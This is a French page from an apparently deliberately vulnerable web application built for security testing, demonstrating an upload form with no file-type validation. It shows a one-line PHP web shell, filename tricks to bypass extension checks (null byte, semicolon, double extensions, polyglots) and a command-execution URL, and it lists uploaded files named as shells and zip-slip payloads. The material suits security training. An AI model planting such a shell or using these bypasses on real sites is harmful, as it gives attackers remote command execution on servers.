ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!
Cette page permet d'uploader des fichiers sans validation du type ou du contenu.
<?php system($_GET['cmd']); ?>shell.php.jpgshell.php%00.jpg/uploads/vulnerable/shell.php?cmd=whoami| Fichier | Action |
|---|---|
| .gitkeep | Ouvrir |
| .htaccess | Ouvrir |
| magic.php | Ouvrir |
| magic.phtml | Ouvrir |
| polyglot.php.gif | Ouvrir |
| polyglot.php.jpg | Ouvrir |
| polyglot.php.pdf | Ouvrir |
| redsparta_zipslip.zip | Ouvrir |
| rsprt4upload.mvg | Ouvrir |
| rsprt4upload.svg | Ouvrir |
| rsprtok.php | Ouvrir |
| rsprtshell.php | Ouvrir |
| shell.aspx | Ouvrir |
| shell.aspx;.jpg | Ouvrir |
| shell.php | Ouvrir |
| shell.php .jpg | Ouvrir |
| shell.php%00.jpg | Ouvrir |
| shell.php.unknownext | Ouvrir |
| shell.php;.jpg | Ouvrir |
| test.aspx | Ouvrir |
| test.html | Ouvrir |
| test.jsp | Ouvrir |
| test.php | Ouvrir |
| test.php%00.jpg | Ouvrir |
| test.php.jpg | Ouvrir |
| test.phtml | Ouvrir |
| test.svg | Ouvrir |
Creez un fichier shell.php avec ce contenu: